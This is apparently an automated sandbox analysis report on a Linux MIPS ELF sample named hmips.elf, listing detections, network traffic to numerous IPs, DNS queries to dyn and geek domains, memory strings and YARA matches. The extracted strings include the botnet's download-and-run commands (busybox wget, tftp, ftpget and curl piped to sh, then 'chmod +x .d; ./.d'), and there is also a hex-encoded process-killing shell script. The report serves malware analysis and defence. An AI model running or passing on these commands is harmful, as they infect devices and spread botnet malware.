Source: hmips.elf |
ReversingLabs: Detection: 39% |
Source: hmips.elf |
String: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname Kamru/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0 |
Source: global traffic |
TCP traffic: 86.107.100.19 ports 20665,0,2,5,6,9209 |
Source: global traffic |
DNS traffic detected: malformed DNS query: catvision.dyn. [malformed] |
Source: global traffic |
DNS traffic detected: malformed DNS query: hikvision.geek. [malformed] |
Source: global traffic |
DNS traffic detected: malformed DNS query: catlovingfools.geek. [malformed] |
Source: global traffic |
DNS traffic detected: malformed DNS query: shitrocket.dyn. [malformed] |
Source: global traffic |
TCP traffic: 192.168.2.23:51294 -> 86.107.100.19:20665 |
Source: global traffic |
TCP traffic: 192.168.2.23:40680 -> 185.72.8.231:2383 |
Source: global traffic |
TCP traffic: 192.168.2.23:54152 -> 80.78.26.121:2383 |
Source: global traffic |
TCP traffic: 192.168.2.23:43438 -> 212.60.5.153:5522 |
Source: global traffic |
TCP traffic: 192.168.2.23:48188 -> 176.32.32.113:22126 |
Source: global traffic |
TCP traffic: 192.168.2.23:56450 -> 212.192.13.95:16377 |
Source: /tmp/hmips.elf (PID: 6240) |
Socket: 127.0.0.1:1172 |
Jump to behavior |
Source: global traffic |
TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443 |
Source: global traffic |
TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443 |
Source: global traffic |
TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.189.91.42 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 120.224.93.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.166.115.166 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.6.168.44 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 142.119.152.81 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 11.42.56.192 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.196.90.63 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 119.86.34.158 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 154.129.141.96 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 66.82.186.198 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 111.252.80.55 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 34.173.174.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.193.69.189 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 164.136.33.219 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 182.57.234.110 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.250.118.146 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.176.93.125 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 174.130.139.50 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 65.111.149.151 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 15.248.79.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 71.77.221.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 167.114.136.244 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 174.157.249.17 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 217.2.170.5 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 68.231.152.164 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 209.49.174.176 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 120.224.93.115 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 176.166.134.254 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.166.115.166 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 104.1.238.242 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.6.168.44 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 27.28.57.171 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 142.119.152.81 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 11.42.56.192 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 28.211.63.80 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 145.81.142.101 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 153.9.186.174 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 144.68.49.216 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 40.143.23.203 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 208.90.131.245 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 175.85.215.224 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 61.184.163.149 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 157.87.70.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 54.160.157.32 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.15.229.91 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 75.178.106.170 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 18.96.200.187 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 167.29.60.142 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 40.36.238.144 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 39.107.215.89 |
Source: global traffic |
DNS traffic detected: DNS query: shitrocket.dyn |
Source: global traffic |
DNS traffic detected: DNS query: hikvision.geek |
Source: global traffic |
DNS traffic detected: DNS query: catlovingfools.geek |
Source: global traffic |
DNS traffic detected: DNS query: catvision.dyn. [malformed] |
Source: global traffic |
DNS traffic detected: DNS query: hikvision.geek. [malformed] |
Source: global traffic |
DNS traffic detected: DNS query: catlovingfools.geek. [malformed] |
Source: global traffic |
DNS traffic detected: DNS query: shitrocket.dyn. [malformed] |
Source: hmips.elf |
String found in binary or memory: http:///curl.sh |
Source: hmips.elf |
String found in binary or memory: http:///wget.sh |
Source: unknown |
Network traffic detected: HTTP traffic on port 43928 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 42836 -> 443 |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox |
Source: Initial sample |
String containing 'busybox' found: usage: busybox |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox hostname Kamru |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox echo > |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox echo -ne |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox wget http:// |
Source: Initial sample |
String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g |
Source: Initial sample |
String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./Galaxy selfrep |
Source: Initial sample |
String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname Kamru/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0 |
Source: Initial sample |
String containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./Galaxy selfrepI just wanna look/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mpslppcspcsh4 |
Source: ELF static info symbol of initial sample |
.symtab present: no |
Source: classification engine |
Classification label: mal72.troj.linELF@0/0@69/0 |
Source: /tmp/hmips.elf (PID: 6240) |
Queries kernel information via 'uname': |
Jump to behavior |
Source: hmips.elf, 6240.1.00007ffc9714e000.00007ffc9716f000.rw-.sdmp, hmips.elf, 6242.1.00007ffc9714e000.00007ffc9716f000.rw-.sdmp |
Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/hmips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/hmips.elf |
Source: hmips.elf, 6242.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmp |
Binary or memory string: ^U!/usr/bin/vmtoolsd |
Source: hmips.elf, 6240.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmp, hmips.elf, 6242.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmp |
Binary or memory string: ^U!/etc/qemu-binfmt/mips |
Source: hmips.elf, 6240.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmp, hmips.elf, 6242.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmp |
Binary or memory string: /etc/qemu-binfmt/mips |
Source: hmips.elf, 6242.1.0000555e9bc86000.0000555e9bd52000.rw-.sdmp |
Binary or memory string: /usr/bin/vmtoolsd |
Source: hmips.elf, 6240.1.00007ffc9714e000.00007ffc9716f000.rw-.sdmp, hmips.elf, 6242.1.00007ffc9714e000.00007ffc9716f000.rw-.sdmp |
Binary or memory string: /usr/bin/qemu-mips |
Source: Yara match |
File source: hmips.elf, type: SAMPLE |
Source: Yara match |
File source: 6242.1.00007fd79c400000.00007fd79c415000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6240.1.00007fd79c400000.00007fd79c415000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: hmips.elf, type: SAMPLE |
Source: Yara match |
File source: 6242.1.00007fd79c400000.00007fd79c415000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6240.1.00007fd79c400000.00007fd79c415000.r-x.sdmp, type: MEMORY |